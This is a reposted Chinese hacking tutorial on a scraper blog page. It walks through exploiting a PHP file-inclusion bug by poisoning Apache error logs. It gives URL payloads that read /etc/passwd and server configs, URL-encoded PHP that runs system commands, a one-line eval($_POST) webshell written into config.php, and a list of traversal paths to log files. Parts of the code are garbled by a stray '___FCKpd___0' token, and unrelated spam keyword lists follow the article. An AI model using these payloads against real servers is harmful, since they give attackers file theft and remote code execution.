程序博客网 > 网商贷属于淘宝贷款吗

关于php包含Apache日志的随想

来源:互联网 发布:网商贷属于淘宝贷款吗 编辑:程序博客网 时间:2024/05/12 17:48
                             关于php包含Apache日志的随想Author:ZizzyMSN:z1zzy@hotmail.comBlog:http://zizzy.wolvez.orgTeam:http://www.wolvez.orgDate:2006-3-15  关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。  比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句<? include($zizzy); ?>   //包含变量$zizzy你可以http://xxx.com/z.php?zizzy=/etc/inetd.confhttp://xxx.com/z.php?zizzy=/proc/cpuinfohttp://xxx.com/z.php?zizzy=/etc/passwd就可以利用包含语句来查看一些系统环境和密码档文件。那么关于日志包含下面我们来看:比如我们的Apache的服务器配置文件位置在这里/usr/local/apache/conf/httpd.conf那么我们来包含一下httpd.conf,来看下路径信息什么的http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf读出Apache的配置信息,这里列出部分信息。<VirtualHost 218.63.89.2>User #3Group silverServerAdmin webmaster@xxx.comDocumentRoot /home/virtual/www.xxx.comServerName www.xxx.comServerAlias xxx.comErrorLog /home/virtual/www.xxx.com/logs/www-error_logCustomLog /home/virtual/www.xxx.com/logs/www-access_log commonScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/Alias /icons/ /home/virtual/www.xxx.com/icons</VirtualHost>而我们提交http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log就可以读出Apache的错误日志记录[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not exist: /home/virtual/www.xxx.com/hack.php[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not exist: /home/virtual/www.xxx.com/111111111.php[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not exist: /home/virtual/www.xxx.com/22222.php3[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/forum[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/blog[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke directory as script: /home/virtual/www.xxx.com/kkkkkkkk而数据日志/home/virtual/www.xxx.com/logs/www-access_log也是一样的,一样可以读出来,只不过文件会很大,那也没意思测试下去了,那怎么利用呢。比如我们提交要提交这句,<?phpinfo();?>  //查看php的相关信息在这里,我们只能提交URL编码模式,因为我在测试中发现,<?的标记并不被记录,只有转换成URL编码提交才会被完整记录。在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E这样肯定会报出错找不到页面,而一出错就被记在错误日志里了http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log这样这个日志文件就被包含成了phpinfo的信息,而回显也就成了一个显示php信息的页面。<img>http://2096.blogbus.com/files/1142768912.jpg</img>如果可以的话(能够执行系统命令,也就是safe_mode开着的时候),这样子也不错,<?system("ls+-la+/home");?>   //执行命令列出home下的文件列表,记得转换为URL格式哦。/home/total 9-rw-r--r--    1 www.xxx.com   silver         55 Jan 20 23:01 about.phpdrwxrwxrwx    4 www.xxx.com   silver       4096 Jan 21 06:07 abc-rw-r--r--    1 www.xxx.com   silver       1438 Dec  3 07:39 index.php  -rwxrwxrwx    1 www.xxx.com   silver       5709 Jan 21 20:05 show.php   -rw-r--r--    1 www.xxx.com   silver       5936 Jan 18 01:37 admin.php-rwxrwxrwx    1 www.xxx.com   silver       5183 Jan 18 15:30 config.php3-rw-rw-rw-    1 www.xxx.com   silver     102229 Jan 21 23:18 info.txt drwxr-xr-x    2 www.xxx.com   silver       4096 Jan  8 16:03 backup  -rw-r--r--    1 www.xxx.com   silver       7024 Dec  4 03:07 test.php这样就列出了home下的文件或者直接一句话木马<?eval(
___FCKpd___0
 POST[cmd]);?>,这样转换后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 这样的格式。我们提交http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 再用lanker的一句话木马客户端一连就OK了。因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。比如还是这句一句话木马<?eval(
___FCKpd___0
 POST[cmd]);?>   到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval(
___FCKpd___0
 POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval(
___FCKpd___0
 POST[cmd]);?>");fclose($fp);?>   //在config.php里写入一句木马语句我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。转换为%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E我们提交http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E这样就错误日志里就记录下了这行写入webshell的代码。我们再来包含日志,提交http://xxx.com/z.php?zizzy=/home/virtual/www.xxx.com/logs/www-error_log这样webshell就写入成功了,config.php里就写入一句木马语句OK.http://www.xxx.com/forum/config.php这个就成了我们的webshell直接用lanker的客户端一连,主机就是你的了。PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用其他的日志路径,你可以去猜,也可以参照这里。附:收集的一些日志路径../../../../../../../../../../var/log/httpd/access_log../../../../../../../../../../var/log/httpd/error_log../apache/logs/error.log../apache/logs/access.log../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../../../../etc/httpd/logs/acces_log ../../../../../../../../../../etc/httpd/logs/acces.log ../../../../../../../../../../etc/httpd/logs/error_log ../../../../../../../../../../etc/httpd/logs/error.log ../../../../../../../../../../var/www/logs/access_log ../../../../../../../../../../var/www/logs/access.log ../../../../../../../../../../usr/local/apache/logs/access_log ../../../../../../../../../../usr/local/apache/logs/access.log ../../../../../../../../../../var/log/apache/access_log ../../../../../../../../../../var/log/apache/access.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/www/logs/error_log ../../../../../../../../../../var/www/logs/error.log ../../../../../../../../../../usr/local/apache/logs/error_log ../../../../../../../../../../usr/local/apache/logs/error.log ../../../../../../../../../../var/log/apache/error_log ../../../../../../../../../../var/log/apache/error.log ../../../../../../../../../../var/log/access_log ../../../../../../../../../../var/log/error_log/var/log/httpd/access_log          /var/log/httpd/error_log        ../apache/logs/error.log        ../apache/logs/access.log  ../../apache/logs/error.log  ../../apache/logs/access.log  ../../../apache/logs/error.log  ../../../apache/logs/access.log  /etc/httpd/logs/acces_log  /etc/httpd/logs/acces.log  /etc/httpd/logs/error_log  /etc/httpd/logs/error.log  /var/www/logs/access_log  /var/www/logs/access.log  /usr/local/apache/logs/access_log  /usr/local/apache/logs/access.log  /var/log/apache/access_log  /var/log/apache/access.log  /var/log/access_log  /var/www/logs/error_log  /var/www/logs/error.log  /usr/local/apache/logs/error_log  /usr/local/apache/logs/error.log  /var/log/apache/error_log  /var/log/apache/error.log  /var/log/access_log  /var/log/error_log
 
网商贷属于淘宝贷款吗 网商贷属于淘宝贷款吗
原创粉丝点击
热门IT博客
java继承的作用java继承的作用
c语言输出100以内质数c语言输出100以内质数
mysql导入数据
一苇渡江网络培训
linux关闭自启动服务
网上报税软件下载
淘宝哪家店的沉香靠谱
大中华帝国史 淘宝
于正 抄袭 知乎
骑士比赛数据统计
跟老齐学python第二版
mastercam编程步骤
手机qq游戏网络异常
淘宝销售说明
js调用点击事件
软件测试行业
mysql date int
兄弟连php网站
java多线程并发实例
mac删除照片
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 男灯芯绒裤子 灯芯绒可以机洗吗 灯芯绒面料的优缺点 灯芯绒裤子配什么上衣 秋冬男裤 男士裤子韩版修身 灯芯草的作用 灯芯草功效与作用 灯芯草图片 灯芯草对小孩的作用 灯芯草煮水功效与作用 灯英文 灯的英文 灯的英文单词 蓝灯英文 灯英语 灯英语怎么说 灯英语怎么读 灯用英语怎么说 灯的英语 灯 英语 灯的英语怎么说 灯的英语怎么读 床头灯英语5000 灯的英语单词 草把做灯歇后语 猜灯谜大全及答案2017 发动机故障灯闪烁 led灯打开后不停闪烁 冰箱冷藏灯闪烁 转向灯闪烁过快的原因有哪些 闪烁灯 发动机故障灯闪烁是什么原因 美的电饭煲灯全部闪烁 空调电源灯闪烁不工作 空调运行灯闪烁 惠普打印机故障灯闪烁图解 佳能mg2400警示灯闪烁 打印机黑色墨水灯闪烁 灯露椎 一线品牌灯饰有哪些

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里